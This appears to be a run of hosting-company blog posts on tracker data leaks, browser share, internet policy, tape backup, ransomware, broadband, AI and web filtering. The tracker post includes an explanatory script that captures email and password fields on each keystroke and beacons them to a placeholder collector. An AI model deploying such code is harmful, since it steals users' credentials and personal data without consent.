3rd-Party Web Trackers Logging Pre-Submission Information Entered


Most people are extra mindful these days of what information they share digitally, and even most kids are aware that you can’t be entirely at ease about what you type into a submission field before pressing ‘Enter’. You need to be mindful of what you share, but it turns out you need to be just as careful before you ever press that enter button at all. Many people may think they’ve smartly avoided any potential problems by backspacing over something they typed and were about to submit, but it turns out the damage may already be done.

We’ll get to what exactly is at issue here, but before we do we should make clear that ‘leaks’ aren’t always intentional. Many times information is exposed not because someone chooses to expose it, but because it sits in a location that doesn’t actually have the security protections its owners and users assume it does. The truth of the matter is that it is nearly impossible to be airtight with this stuff 100% of the time.

Here at 4GoodHosting we’re like any other good Canadian web hosting provider in that we like to share information with our customers anytime we come across an example of it that we know will have real significance for them. This is one of those scenarios, as nearly everyone will at some point voluntarily provide information about themselves when asked to do so online. Anything that puts you more in the know about the dos and don’ts here is going to be helpful, so here we are for this week.

Made Available

A recent study that looked into the top 100,000 ranked websites indicates that many are leaking information you enter into site forms to third-party trackers, and that this may be happening even before you press submit. The data being leaked may include personal identifiers, email addresses, usernames, and passwords, along with messages that were entered into forms but deleted and never actually submitted.

This type of data leak is sneaky because until now internet users would assume that the information they type on websites isn’t available unless they submit it. That IS true most of the time, but for almost 3% of all tested sites, once it’s typed out it may already have been made available, and that’s the reality even if you don’t actually submit the info.

A crawler based on DuckDuckGo’s Tracker Radar Collector tool was used to monitor exfiltration activity, and the results confirm that this is very much a possibility. There’s also not much, if anything, to tip users off that this risk is present and that information should ideally not be entered into the field at all.

Nearly 1.9k of Sites

The crawler was equipped with a pre-trained machine-learning classifier that detected email and password fields as well as making access to those fields interceptable. The test then ran against 2.8 million pages found on the top 100,000 highest-ranking sites in the world, and found that 1,844 of those 100k websites let trackers exfiltrate email addresses before submission when visited from Europe. That is not such a high percentage, but the same ratio in America is an entirely different story.

When visiting those same websites from the US, a full 2,950 sites were collecting information before submission, and in addition researchers determined 52 websites to be collecting passwords in the same way. It should be mentioned that some of them did make changes and efforts to improve security after being made aware of the research findings and informed that they were leaking.

The logical next question here is: who is receiving the data? We know that website trackers serve to monitor visitor activity, derive data points related to preferences, log interactions, and create an ID for each user, one that is – supposedly – anonymous. Trackers are used by sites to give a more personalized online experience to their users, and the value for them is having advertisers serve targeted ads to their visitors with an eye to increasing monetary gains.

Keystroke Monitoring

The bulk of these 3rd-party trackers use scripts that monitor for keystrokes inside a form. When this happens they save the content and collect it even before the user has pressed that submit button. The fallout is that data entered on forms gets logged and tied back to the visitor, undoing the supposed anonymity of the tracker ID and pushing privacy and security risks up big time.
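To make the mechanism concrete, here is a minimal sketch of how a script of this kind can capture field contents on every keystroke. It is our own illustration rather than code from the study, and the collection endpoint is a made-up placeholder:

```typescript
// Hypothetical pre-submission exfiltration script.
// "collect.example-tracker.com" is a placeholder, not a real tracker endpoint.
document
  .querySelectorAll<HTMLInputElement>('input[type="email"], input[type="password"]')
  .forEach((field) => {
    field.addEventListener("input", () => {
      // The value is read on every keystroke, long before any submit event fires.
      const payload = JSON.stringify({ name: field.name, value: field.value });
      navigator.sendBeacon("https://collect.example-tracker.com/log", payload);
    });
  });
```

Because the listener fires on input rather than on submit, backspacing over the text afterwards does nothing to undo what has already been sent.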

There are not a lot of these trackers out there, and most of the ones in operation are known by name: 662 sites were found to have LiveRamp’s trackers, 383 had Taboola, Adobe’s Bizible was running on 191 of them, and Verizon was collecting data from 255 sites. All of this reinforces the understanding that the problem stems from a small number of trackers that are prevalent on the web.

So what is a person or organization to do? The consensus is that the best way to deal with this problem is to block all 3rd-party trackers using your browser’s internal blocker. A built-in blocker is standard for nearly all web browsers, and it is usually found in the privacy section of the settings menu.

Private email relay services are a smart choice too, because they give users the capacity to generate pseudonymous email addresses. In the event someone does get their hands on one, identification won’t be possible. And for those who want to be maximally proactive there is a browser add-on named Leak Inspector that monitors exfiltration events on any site and warns users when there is a need for it.

Edge Now Second Only to Chrome as Web Browser of Choice

We can go right ahead and assume that there are plenty of Mac users who opt to use Chrome as their browser rather than the Safari their device came with. We say that with confidence because we’re one of them, and it is a fact that Google’s offering continues to be the de facto choice of web browser for the majority of people all around the world. There are plenty of reasons for that, although at the same time we will be like most people and say that both Safari and Firefox aren’t bad per se. Internet Explorer on the other hand is an entirely different story.

Now to be fair, if IE hadn’t been left to wither on the vine that might not be the case, but the fact it was played a part in why the Edge browser has made the inroads into the market it has. But as always choice is a good thing, and if anything it puts the pressure on the runners-up to get better and reclaim whatever user share they’ve lost. So competition joins choice as a good thing. This is one topic that everyone can relate to, and it’s been a topic of discussion in nearly every office here in North America and likely elsewhere around the globe.

Like any good Canadian web hosting provider we’re no different here at 4GoodHosting, and you can be sure that those of us around here have the same strong opinions about which web browser is best and why. Likely you have much the same going on around your places of productivity, so this is the topic for our blog entry this week.

Closed the Gap

February of this year had Microsoft Edge on the cusp of catching Safari, with less than half a percentage point separating the 2 browsers in terms of popularity among desktop users. Estimates are now that Edge is used on 10.07% of desktop computers worldwide, and that is 0.46 points ahead of Safari, which has now dipped down to 9.61%.

Google Chrome is still far and away the top dog though, being the browser of choice for 66.58% of all desktop users. Mozilla’s Firefox isn’t doing nearly as well as either of them, currently with just 7.87% of the share. That’s quite the drop from the 9.18% share it had just a few months ago.

Edge’s lead on other browsers, however, needs to be qualified depending on location. If we look at just the US, Edge trails Safari by quite a bit with only 12.55% of market share as compared to Safari’s 17.1%. In contrast Edge long ago passed Safari on the other side of the pond, with 11.73% and 9.36%, respectively, in Europe.

And for Firefox it’s not looking promising at all, despite it being what we consider a very functional browser that doesn’t really come up short in comparison to others if you look at it strictly from the performance angle. Yes, it doesn’t have the marketing clout of either Microsoft or Google and that means brand recognition won’t be the same.

Long Ago in January 2021

As the default Windows 11 browser, Edge has seen its popularity go up quite a bit. We talked about February of this year, but let’s go back a year and a month further, to the start of 2021. There were concrete signs even then that Edge would pass Safari for 2nd place in user popularity, and at that time the estimate was that it was being used on 9.54% of desktops globally. Back in January 2021 Safari was in possession of a 10.38% market share, so what we are seeing is a gradual decline in its popularity over the last year-plus.

Chrome continues to move forward with speed though, even if it’s not ‘pulling away’ at all. It has seen its user base increase ever so slightly over that time, but at the same time Firefox has been losing users since the beginning of the year. And that is true even though Firefox hasn’t been at rest at all and has made regular updates and improvements to its browser.

So perhaps Apple and Safari can take some consolation in the fact they’re holding on to third place quite well, but the reality is they have lost 0.23 points of market share since February. However, we should keep in mind that Apple has hinted it may be making sweeping changes to the way Safari functions in macOS 13 towards the end of 2022.

Different for Mobile

It’s a different story for mobile platforms, and that can be directly attributed to Microsoft’s lack of a mobile operating system since Windows Mobile was abandoned. In this same market analysis Edge doesn’t even crack the top 6 browsers for mobile, while Chrome has 62.87% of usage share and Safari on iPhones and iPads comes in at 25.35% for a comfortable second place. Samsung Internet comes 3rd with 4.9%.

Overall statistics for desktop and mobile combined – Chrome 64.36%, Safari 19.13%, Edge 4.07%, Firefox 3.41%, Samsung Internet 2.84%, and Opera 2.07%.

It is true that Safari for desktop has received complaints from users recently over bugs, user experience, and matters related to website compatibility. Apple’s Safari team responded to that by asking for feedback on improvements, and to be fair it did lead to a radical redesign of the browser. Many of those changes were rolled back before the final version was publicly released in September.

New ‘Declaration of the Future of the Internet’ Signed Onto by More than 60 Countries

Go back some 30 years and those of us who were anywhere past adolescence by that time would be dumbfounded to learn just how life-changing this new ‘Internet’ thing would become, along with being impressed with dial-up modems in a way that would seem bizarre nowadays considering where that technology has gone in such a short time. As with anything there have been growing pains with the Internet too, and like any influential and game-changing technology it has been used for ill in the same way it’s provided good for society.

It’s also become an integral internationally shared resource, and that goes beyond just the sphere of business. The interconnectivity of the modern world is increasingly dependent on the submarine cables laid across entire ocean floors so that the globe can be connected by the Internet, and here at 4GoodHosting we are like any good Canadian web hosting provider in that it’s something near and dear to our hearts given the nature of what we do for people and the service we provide.

This is in part connected to the need to safeguard the future of the Internet, as there are so many complexities to it that didn’t exist previously and no doubt there will be more of them in the future. This is why the recently-signed Declaration of the Future of the Internet is such a big deal and more than worthy of being the subject for this week’s blog entry here.

Protecting Democracy & More

One of the ways the Internet has most notably been abused is to threaten democratic institutions, the legitimacy of election results and the like, and there’s no doubt that there are anti-North American interest groups in other parts of the world using the Web as a means of infiltrating and being subversive within democratic institutions. The belief is that if no efforts are made to nip this in the bud or counter it now then it may become too big to rein in in the future.

This is why there was such a push to get countries onboard for this declaration now, and it seems there was enough enthusiasm and resolve to see it through. The Declaration of the Future of the Internet is meant to strengthen democracy online, as the countries that have agreed to its terms have promised they will not undermine elections by running online misinformation campaigns or illegally spying on people. At least this is according to the White House.

More specifically, what the declaration does is commit to the promotion of safety and the equitable use of the internet, with countries signed on agreeing to refrain from imposing government-led shutdowns and also committing to providing both affordable and reliable internet services for their populace. This declaration isn’t legally binding, but countries signed on have been told that if they back out they will get a very disapproving finger wag from Sleepy Joe at the very least.

Bigger Picture Aim

What this declaration is more accurately aiming to do is have the principles set forth within it serve as a reference for public policy makers, businesses, citizens and civil society organizations. The White House put out a fact sheet providing further insight on how the US and other partners will collaborate to safeguard the future of the internet, saying they and their partners will work together to promote this vision and its principles globally, but with respect for each other’s regulatory autonomy within their own jurisdictions and in accordance with their respective domestic laws and international legal obligations.

60 and Counting

So far 60 countries have committed to the declaration and there is the possibility of more doing so in the next little while. Russia, China and India were the notable absentees, and while India is a bit of a surprise the other 2 are not, considering the reasons they might have for interfering in democratic processes and for seeing the web as one of the most effective ways of making that happen. Google is among the US-based tech giants endorsing the declaration, and their assertion is that the private sector must also play an important role in furthering internet standards.

What is likely is that something similar will be required every couple of decades or so moving forward, particularly if the web is to make even deeper inroads into everyday life. It certainly has shown it has the potential for that, and that potential is likely growing all the time.

Tape Storage’s Resurgence for Unstructured Data


It’s not necessarily devolution when you choose to go back to an outdated technology, although many people will be absolute in their thinking that it is. But there are plenty of instances where the way it used to be ends up working better, and often when new operating realities change the game. This can be true if we look at it from the perspective of data storage where companies are doing what everyone else is doing – that is, choosing to locate most of that data storage in the cloud. Now if we were to collectively lose our minds and revert back entirely to physical storage, that would be devolution.

Where we’re going with this is that some physical storage means are making a comeback, and for plenty of good reasons. Tape storage for unstructured data is one example here that’s really at the forefront these days, and naturally anything related to data storage will be relatable for us here at 4GoodHosting or for any good Canadian web hosting provider. We’re always attuned to the need for data storage security, and it’s a priority for us in the same way it is for many of you.

So that is why we see tape storage’s ongoing resurgence as being at least somewhat newsworthy and we’re making it the topic for this week’s entry. Let’s get into it.

Obsolete? Not so Fast

The fact that a record 148 exabytes of tape was shipped last year definitely indicates that tape storage has not become obsolete at all. In fact, a recent report shows that LTO tape saw an impressive 40% growth rate for 2021. The reason for this is that many organizations are attempting to cut costs related to cloud storage when archiving their unstructured data. And while only 105EB of total tape capacity was shipped during the pandemic in 2020, the amount ordered for 2021 set a new record.

What we’re seeing here is organizations returning to tape technology, seeking out storage solutions that have the promise of higher capacities, reliability, long term data archiving and stronger data protection measures that have what is needed to counter ever-changing and expanding cybersecurity risks.

Increasing prevalence and complexity of malware is a contributing factor too. Irreparable harm can come from an organization having its systems infected with malware and the potential for harm is nearly the same as when data is locked following a ransomware attack. It’s true there are many well-established ways a company can be proactive in defending against the latest cyberthreats, but at the same time tape storage prevents sensitive files and documents from being online to begin with.

Air Gap is Key

We’re also seeing many businesses and organizations turning to LTO tape technology for increased data protection in response to surging ransomware attacks. The key component that makes it superior and effective is an air gap, which denies cybercriminals the physical connectivity needed to access, encrypt, or delete data.

Also of significance in all of this is the 3-2-1-1 backup rule. You’ve likely never heard of that, so let’s lay out what it is. It means making at least three copies of data, storing them on 2 different storage media, keeping one copy off site, and keeping another one offline. LTO-9 tape also makes it easier for businesses to store more data on a single tape because of its increased storage capacity, which can be as high as 45 terabytes when compressed.
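As a quick illustration of the rule, here is a small sketch of our own (not taken from any particular backup product) showing how a backup plan could be checked against the 3-2-1-1 criteria:

```typescript
interface BackupCopy {
  medium: "disk" | "tape" | "cloud";
  offsite: boolean;
  offline: boolean; // e.g. an air-gapped tape cartridge in a vault
}

// True when a plan satisfies 3-2-1-1:
// 3+ copies, 2+ different media, 1+ copy off site, 1+ copy offline.
function meets3211(copies: BackupCopy[]): boolean {
  const media = new Set(copies.map((c) => c.medium));
  return (
    copies.length >= 3 &&
    media.size >= 2 &&
    copies.some((c) => c.offsite) &&
    copies.some((c) => c.offline)
  );
}

// Example: primary disk copy, a cloud replica, and an offline LTO tape stored off site.
console.log(
  meets3211([
    { medium: "disk", offsite: false, offline: false },
    { medium: "cloud", offsite: true, offline: false },
    { medium: "tape", offsite: true, offline: true },
  ])
); // true
```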

As a last note promoting this type of storage for unstructured data, this medium also has the advantage of being backward compatible with LTO-8 cartridges in the event that any organization still needs to work with existing tape storage. It certainly is nice to have options, and sometimes what is now old may be a better fit than what is newer and has replaced it.

Why Ransomware Tends to Avoid Cloud Environments


Ransomware attacks can be headaches of the highest order, and in many instances they have disastrous repercussions, to say nothing of the major expenses those repercussions are paired with no matter how the problem ends up being resolved. When Japanese automaker giant Toyota had to shut down 14 factories across the country for one day, it was staggering to see just how much financial loss could come from just 24 hours of dealing with an attack.

Most businesses will be of a much smaller scale, but there have also been plenty of instances of data being breached at businesses that no one will necessarily be familiar with. No matter the size of the operation, if you have sensitive data stored in digital format – and who doesn’t nowadays – then you will want to make sure you have all the defences in place and ready to do their job if and when it’s needed of them. Ransomware attacks are increasing; between 2019 and the end of 2021 they rose well over 200% worldwide, and again it’s not always just the big fish being attacked.

It likely goes without saying that data management and data security are two aspects of operation that we can relate to here at 4GoodHosting, and that will almost certainly be true for any other quality Canadian web hosting provider with the same solid operating principles for their web hosting business. Like most we’re also as enthusiastic and bullish about the ever-evolving potential for cloud computing, which leads us to our topic of discussion for this entry – why do ransomware attacks tend to look past cloud computing environments when weighing potential victims?

Franchised Ransomware

A recent advisory from the Cybersecurity and Infrastructure Security Agency (CISA), the US FBI, and the NSA reveals the latest trend is now ransomware as a service, where gangs of malicious hackers essentially ‘franchise’ their ransomware tools and techniques and make them available to less organized or less skilled hackers. This works out to many more attacks, even if some of them are less sophisticated than others for the same reason.

But the long and short of it is protecting against ransomware attacks must be part of any organization’s holistic cybersecurity strategy. And it turns out that is especially true if you’re still operating data center infrastructure and not cloud infrastructure. Hardening data centers and endpoints to protect against ransomware attacks is more and more needed every year, but it is true that cloud infrastructure faces a different kind of threat.

To be clear – if your organization is all in the cloud, ransomware can be less of a worry.

What, and Why?

First and foremost, you shouldn’t mistake ransomware attacks for simple data breaches. A data breach only means data has been exposed, and it doesn’t even necessarily mean that data has been taken. Ransomware isn’t primarily ‘stealing’ either; the aim is usually not to steal your data but to take control of the systems that house it, or to encrypt it, and prevent you from having access to it unless you pay to have that access re-established for you.

The reason why ransomware attacks are not being carried out against cloud environments has everything to do with fundamental differences between cloud infrastructure and data center infrastructure.

For starters, any cloud environment is not simply a remote replica of its onsite data center and IT systems. Cloud computing is 100% software driven by APIs – application programming interfaces – which function as middlemen for the software and allow different applications to interact with each other. The control plane is the API surface that configures and operates the cloud, and that control plane may be used to build a virtual server, modify a network route, and gain access to data in databases or snapshots of databases.
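To give a sense of what ‘everything goes through the control plane’ means in practice, here is a minimal sketch using the AWS SDK for JavaScript v3; the region and volume ID are placeholders, and any real environment would differ:

```typescript
import { EC2Client, CreateSnapshotCommand } from "@aws-sdk/client-ec2";

// Every operation below is just an authenticated API call to the control plane;
// no physical console or cabling is involved.
const ec2 = new EC2Client({ region: "ca-central-1" });

async function snapshotVolume(volumeId: string): Promise<string | undefined> {
  // Creates a point-in-time snapshot of a storage volume via the control plane.
  const result = await ec2.send(
    new CreateSnapshotCommand({
      VolumeId: volumeId, // placeholder, e.g. "vol-0123456789abcdef0"
      Description: "Routine backup taken through the control plane API",
    })
  );
  return result.SnapshotId;
}

snapshotVolume("vol-0123456789abcdef0").then((id) => console.log("Snapshot:", id));
```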

Key Resilience

Cloud platform providers have been working around the understanding that customers who pay for the technology and service expect data to be robust and resilient. Keep in mind replicating data in the cloud is both easy and cheap, and a well-architected cloud environment ensures multiple backups of data are done regularly. That’s the key means by which an attacker’s ability to use ransomware is impeded. Frequently taking multiple copies of your data means they have less ability to lock you out. Should an attacker be able to encrypt your data and demand a ransom, you can take all their leverage away from them by simply reverting to the latest version of the data backed up prior to the encryption.
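As a simple illustration of that recovery logic (our own sketch, not tied to any particular provider), the restore step amounts to picking the most recent backup taken before the encryption event:

```typescript
interface Snapshot {
  id: string;
  takenAt: Date;
}

// Returns the newest snapshot taken strictly before the ransomware hit,
// which is the copy you would restore to take away the attacker's leverage.
function latestCleanSnapshot(snapshots: Snapshot[], attackTime: Date): Snapshot | undefined {
  return snapshots
    .filter((s) => s.takenAt < attackTime)
    .sort((a, b) => b.takenAt.getTime() - a.takenAt.getTime())[0];
}

const backups: Snapshot[] = [
  { id: "snap-a", takenAt: new Date("2022-05-01T02:00:00Z") },
  { id: "snap-b", takenAt: new Date("2022-05-02T02:00:00Z") },
  { id: "snap-c", takenAt: new Date("2022-05-03T02:00:00Z") },
];

// Attack detected mid-day on May 2nd: snap-b is the newest clean copy.
console.log(latestCleanSnapshot(backups, new Date("2022-05-02T13:30:00Z"))?.id);
```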

Effective security in the cloud is the result of good design and architecture rather than reactive intrusion detection and security analysis. Hackers have no other choice but to try to exploit cloud misconfigurations that enable them to operate against your cloud control plane APIs and steal your data. And to this point very few if any of them have had much success with that.

Automation is Best

Having cloud security protocols work automatically is best, as the number of cloud services keeps growing along with the number of deployments most of you will have. Add all the expanding resources and you can see why there is a need to move away from manually monitoring for misconfigurations, and to enable developers to write code that stays flexible for future revisions. Hardening your cloud security ‘posture’ is helpful too, with efforts to know your operating environment and its weak points on an ongoing basis, as well as continuously surveying your cloud environment to maintain situational awareness at all times.
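As one small example of what automated posture checking can look like, here is a sketch on our part using the AWS SDK for JavaScript v3 against S3 (your own cloud and tooling may differ); a scheduled job like this can flag buckets that don’t have public access fully blocked:

```typescript
import {
  S3Client,
  ListBucketsCommand,
  GetPublicAccessBlockCommand,
} from "@aws-sdk/client-s3";

const s3 = new S3Client({ region: "ca-central-1" });

// Flags any bucket where the public-access block is missing or incomplete,
// one of the most common cloud misconfigurations.
async function findExposedBuckets(): Promise<string[]> {
  const exposed: string[] = [];
  const { Buckets = [] } = await s3.send(new ListBucketsCommand({}));
  for (const bucket of Buckets) {
    try {
      const { PublicAccessBlockConfiguration: cfg } = await s3.send(
        new GetPublicAccessBlockCommand({ Bucket: bucket.Name! })
      );
      const fullyBlocked =
        cfg?.BlockPublicAcls &&
        cfg?.IgnorePublicAcls &&
        cfg?.BlockPublicPolicy &&
        cfg?.RestrictPublicBuckets;
      if (!fullyBlocked) exposed.push(bucket.Name!);
    } catch {
      // No public-access-block configuration at all counts as a finding too.
      exposed.push(bucket.Name!);
    }
  }
  return exposed;
}

findExposedBuckets().then((names) => console.log("Needs attention:", names));
```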

Successful organizations evaluate all the time to know where they stand, where they’re going, and to quantify the progress they’ve made and are making towards addressing vulnerabilities and the security incidents that have or may result from them.

Toronto First to Get 3 Gbps Internet from Bell in Canada

Patience may well be a virtue, but few of us have much of it when we’re doing whatever it is we’re doing online. We all remember those ads from years ago when broadband internet was new, where they compared the previous super slow speeds to sucking a milkshake through the narrowest of straws. We’re a long way from that, and while the standard 1.5 gigabit-per-second speeds have been quite nice, if there are improvements to be made well then let’s get right to that.

Bell is one of the big players as a home broadband internet provider and they are the first to now be making 3 Gbps internet speeds available to Canadian consumers. We don’t need to talk about how this will appeal to people, and the need for ever-better download and upload speeds is something that those of us here at 4GoodHosting will relate to in the same way any good Canadian web hosting provider would. We are tops for VPS virtual private server web hosting in Canada and we know that it is sites like these with dynamic content that will be among the many better served this way.

People with sites hosted are going to want to have uptime guarantees for sure, but let’s not forget that these faster Internet speeds in Canada are also going to pair exceptionally well with the new 5G networks, and what is most noteworthy there is what that will do for Internet of Things applications and all that is set to do for the welfare of humanity and more.

Toronto is Canada’s most populous urban area, so it likely makes sense that the new 3-Gig internet speeds are going to be made available there first. Exciting news for anyone in Hogtown, so let’s use this week’s entry to look into this in greater detail.

Sub-30 Seconds

Downloading a 10GB file might not necessarily have been daunting in the past, but you would certainly understand you wouldn’t be viewing anything anytime soon. With this new type of high speed internet, it is a whole different story. Bell announced this new plan on April 6th, and as mentioned the fanfare expected for doubling existing Internet speeds to a full 3 Gbps needs no explanation. That’s for both download and upload speeds, and we haven’t even touched on what this will do for gaming.

At peak performance, users can download a 10GB file in under 30 seconds, and the plan is ideal for users like content creators who have ongoing needs to move data to and from the cloud in very large quantities. Downloading games is going to benefit in a big way too, and downloads of tens or even hundreds of gigabytes aren’t going to seem like such a big deal. Small businesses and home offices may also see higher productivity levels resulting from the higher bandwidth.
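The under-30-seconds figure checks out with simple arithmetic, as the quick calculation below shows (a theoretical best case that ignores protocol overhead and real-world congestion):

```typescript
// A 10 GB file over a 3 Gbps link, best case.
const fileSizeGigabytes = 10;
const fileSizeGigabits = fileSizeGigabytes * 8;   // 80 gigabits
const linkSpeedGbps = 3;

const seconds = fileSizeGigabits / linkSpeedGbps; // ≈ 26.7 seconds
console.log(`~${seconds.toFixed(1)} seconds`);
```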

Start in TO, but Expansion Soon

This is all part of making broadband and higher-speed Internet available to all, and Bell is only one of many providers taking part in the initiative. They are in the midst of their most aggressive fibre buildout ever in 2022, aiming to connect 900,000 more homes and businesses across much of Canada with direct fibre connections and making this level of upload and download speed available to all of them.

Bell’s 2-year capital expenditure program has put almost $10 billion into this, and it is now in its second year where the focus is on an efficient and timely rollout of its broadband fibre, 5G and rural networks.

All of this stands to be fairly reasonably priced too – currently this new internet package from Bell is available to GTA area residents for $150 a month, and they are at this time offering the Home Hub 4000 router-modem with Wi-Fi 6 capabilities. If the highest of high-speed internet is music to your ears then get set to be as pleased as can be.

Human Side of Artificial Intelligence


If there has been any time in human history where technological advances in computing have come as fast and furious as they have recently, we’re not aware of it and likely you aren’t either. What comes with so much promise also comes with some level of trepidation for people, but that has always been the case with any type of game-changer advance that’s been seen in human society. A.I. is a great example where we wouldn’t even think about slowing the speed of change it is promising but at the same time most of us hope this doesn’t go sideways in any regard.

But one aspect of this where the potential positive ramifications absolutely must be encouraged is with making better use of data. This is something that any Canadian web hosting provider will be able to relate to, and here at 4GoodHosting we are no different. We understand the magnitude and potential for data management, but can also relate to a lot of shortcomings in how this data is understood and utilized properly.

Which leads us to the topic at hand here today. Advances in AI research have made it so that using computer algorithms to differentiate patterns from noise in data is entirely possible, and we now have open-source software and many data scientists streaming into the field. All of this leads to the belief that computer science, statistics, and information technology can lead to a successful AI project with useful outcomes. Teaching humans to think like AI will have value, but teaching AI to understand the value of humans will have even more of it.

Deep – and Deeper – Learning for Neural Networks

One of the most notable ways deep learning neural networks are being put to use is in healthcare, and specifically with more accurately predicting health outcomes. What we are seeing now is state-of-the-art AI algorithms predicting health outcomes fairly accurately. This could be for whether a patient should be readmitted to the hospital following a surgery, or any number of other very significant decisions that may be better made with AI and its modeling as compared to what a doctor might advise on their own.

While it is true that the deep learning models performed better than some standard clinical models, they still came up short against logistic regression, a widely used statistical method. This suggests that AI learning does have limitations, but the consensus seems to be that those limitations are a) not significant enough to scale back deployment, and b) likely to be addressed in future advances with the technology.

Use of AI in healthcare is a great example of how the technology is progressing, so we’ll stick with it for now. There are indeed limitations, and to address them the early days of this rollout had researchers harmonizing all the data and feeding it into a deep learning algorithm before endeavouring to make sense of it. Some factors that may not be useful for clinical intervention weren’t included, primarily because they can’t be changed.

The factors that were prioritized for incorporation into neural network architecture were the ones that would improve the performance and the interpretability of the resulting predictive models. Still, until recently there was less of a focus on how all of this would work when dealing with the human operation end of the equation, and that’s where the focus needs to be now.

Advantage to Human Side of AI

Human involvement with an AI project needs to start with a programmer or engineer formulating the question the AI is to address. Let’s say right off the bat that AI will not be able to master this anytime soon. It requires depth, breadth, and synthesis of knowledge of different kinds, and AI simply isn’t there yet. Imagining what is missing or what is wrong from what is known is – at least for now – very difficult for modern AIs to do.

Humans are also needed for knowledge engineering. This part of it has been important in the AI field for decades, and the current focus is on supplying domain-specific knowledge to the AI in the right format so that it doesn’t need to start from scratch when solving a problem. As powerful as AI can be, we should remember that humans have an ability to synthesize knowledge that far exceeds what any computer algorithm can do. That right there is the crux of why valuable human input and reciprocal learning is going to be absolutely essential if AI is going to do what we hope it will.

As AI moves ever forward in being a big part of our lives, it is important to remember that users and those who stand to benefit from it have a key role to play in the data science process attached to the development of it. Done right it will improve the results of an AI implementation and reduce the potential for harm or misuse.

Insufficient Wi-Fi Connectivity Dampening WFH Prospects for Many

Two years ago this month was the first time that many of us spent more than a handful of days working remotely from home, and as we’ve learned since then a whole lot of people have remarked how it’s done very positive things for their lives. At the same time a lot of employers have said they haven’t seen any dip in productivity, so – why not? Granted a whole lot of us have returned to the office for at least a portion of the week, but if you are able to continue working from home then a strong and reliable Wi-Fi connection is going to be a must.

A report from Cisco that came out early this year indicates that for a lot of people a lack of reliable internet connectivity is forcing them to reconsider the home office. There’s no getting around the fact it’s a deal breaker for most people if that can’t be counted on, although there are ways to improve your internet connection that may be doable provided you aren’t too far out from a major city center. The problem there might be that people have relocated to these quieter locales only to find the internet connection just isn’t good enough.

Here at 4GoodHosting we’re like any Canadian web hosting provider in that we can certainly relate to how that has to be all important. There are many of our customers with websites offering creative services and the like and they are among the thousands of Canadians nationwide who are 100% reliant on their internet to be able to work from home.

So let’s look at everything this report had to say and perhaps get a look at how we’re maybe not entirely ready to have so many people working from home and demanding more than what can be provided when it comes to reliable Wi-Fi.

Broadband Indexing

The report is called Cisco’s Broadband Index, and it was a survey of 60,000 workers in 30 countries who provided feedback on their home broadband access, quality, and usage. It indicates that today people value access to the internet more than ever and believe access to a fast, reliable connection is universally a key to economic and societal growth.

Plus we now have hybrid-office and remote-work business models that have grown out of the COVID-19 pandemic, where employees are relying heavily on the internet connections they’re able to access. Around 84% of survey respondents stated they are actively using broadband at home for longer than 4 hours a day, and 75% of them said broadband services need significant upgrades to support the number of people now able to work from home and wanting to do that.

The challenge is these Internet connections are under much more strain now, and white-collar workers who were confined to their homes during the last two years are a big part of that strain, to go along with all the streaming people of all sorts are doing these days. Here’s another consideration – 60% of survey respondents live in households where more than three people use the internet at the same time.

Many Ready to Upgrade Service

Estimates are that nearly half of the world’s workforce now rely on their home internet to work or run a business, and 43% of respondents stated their intention to upgrade their service in the next 12 months to stay in front of the additional demands being placed on their broadband connection.

As mentioned, there is also a large percentage of workers who are still at home for a significant portion of the work week. Some of them have said they’d rather look for a new job than lose the chance to work from home. So we can see that secure, high-quality, reliable internet is essential, especially if hybrid work models are to continue without interrupting the effective working parts of a business.

Tackling Digital Divide

We may still want to be thankful about how good we do have it with connectivity, considering 40% of the world remains unconnected. One thing industry experts agree on is that the inability to connect those 3-point-something billion people over the next 10 years will likely increase the digital divide. Shortcomings with infrastructure are a significant factor in limited internet around the world. Rural and remote areas are more likely to be offline or insufficiently online, and this is usually due to costs being much higher than in urban areas.

The Broadband Index went further in providing data that puts even more of a light on concerns about the digital divide. 65% of respondents said access to affordable and reliable broadband will become a major issue, particularly if connectivity becomes increasingly vital for job and educational opportunities. Another 58% of those surveyed said there were any number of factors blocking them from access to critical services such as online medical appointments, online education, social care, and utility services, all resulting from an unreliable broadband connection.

Stay Protected with Web Filtering and SafeDNS

It’s likely that no one who has business interests online will be unaware of the size of risk posed by cyberattacks these days. It seems like there’s a new high-profile, large scale one every month or so now and it shows that even though major corporations are spending plenty on cybersecurity it continues to not be enough depending on the nature of the threat and how advanced it may be. Another aspect of it that the average person may not grasp as readily is the fact these attacks often have repercussions that go far beyond just leaked data itself.

The one that maybe doesn’t get talked about enough is reputation, as if you’re big enough to be newsworthy when a cyber attack occurs then you’re big enough to have real interests in how your company is regarded in the big picture. There is definitely a risk to your reputation if a cyber attack of any magnitude occurs and you’re left needing to explain how you didn’t have the right level of security in place. Here at 4GoodHosting we’re like any reputable Canadian web hosting provider in that we fully relate to the need for security, and for businesses like ours that has everything to do with servers.

One newer solution that businesses can consider is web filtering and using the new SafeDNS service that promises to reinforce your web security efforts in a big way. That’s what we’ll look at here today and go into greater detail about why it is so highly recommended for anyone who would have a lot to lose if a cyber attack were able to make its way through their current defenses.

Thwarting Malware

Security has to be a foremost concern for businesses of all sizes, especially with the ever-present risks of malware and other threats as the business grows and expands. The number of these threats is growing all the time, and their sophistication means keeping your business protected online has never been as challenging as it is now. However, there are smart moves you can make.

Moves you should make, if we’re going to be plain about it. As we touched on briefly, being hit by a cyberattack may not just damage data; it may have significant financial and reputational effects, as it did for Target, Equifax and SolarWinds to name just 3 of the high-profile cyber breach cases in recent years. It is estimated that over 80% of businesses have been victimized by ransomware, and some of them report cyberattack attempts occurring up to 4 times a day. Let’s also consider the average ransomware demand for a US business. It’s well over $6 million.

Why Web Filtering

Web filtering may sound like an insignificant contribution when you consider the size and magnitude of the threats and the security landscape in its entirety, but it is a technology that can be very beneficial in making sure your business is never put at risk. This is where we’ll take the opportunity to introduce SafeDNS, which is a comprehensive platform designed to protect organizations from online threats by means of its web filtering technology.

The primary way web filtering keeps your business safe is by monitoring internet traffic for risks such as malware and phishing scams. It also has the ability to restrict access to unsuitable or dangerous websites, which makes it less likely an employee would create a breach unintentionally when visiting an external site where they simply don’t know any better about why it should be avoided. It is an entirely cloud-based service, and the appeal of that of course is that there is no bulky hardware taking up valuable office space, and it can be set up in very little time too.

Installation is not complicated in the slightest, and there are no deployments requiring expensive call-outs. But maybe the most noteworthy advantage it has is the fact the platform runs on powerful AI technology that incorporates machine learning and big data services to keep internet traffic safe. And if you need any other reinforcement of the fact that cyberthreats are a pressing concern, SafeDNS reports that overall it blocks some 33 million or so of them every day.

Other Pros

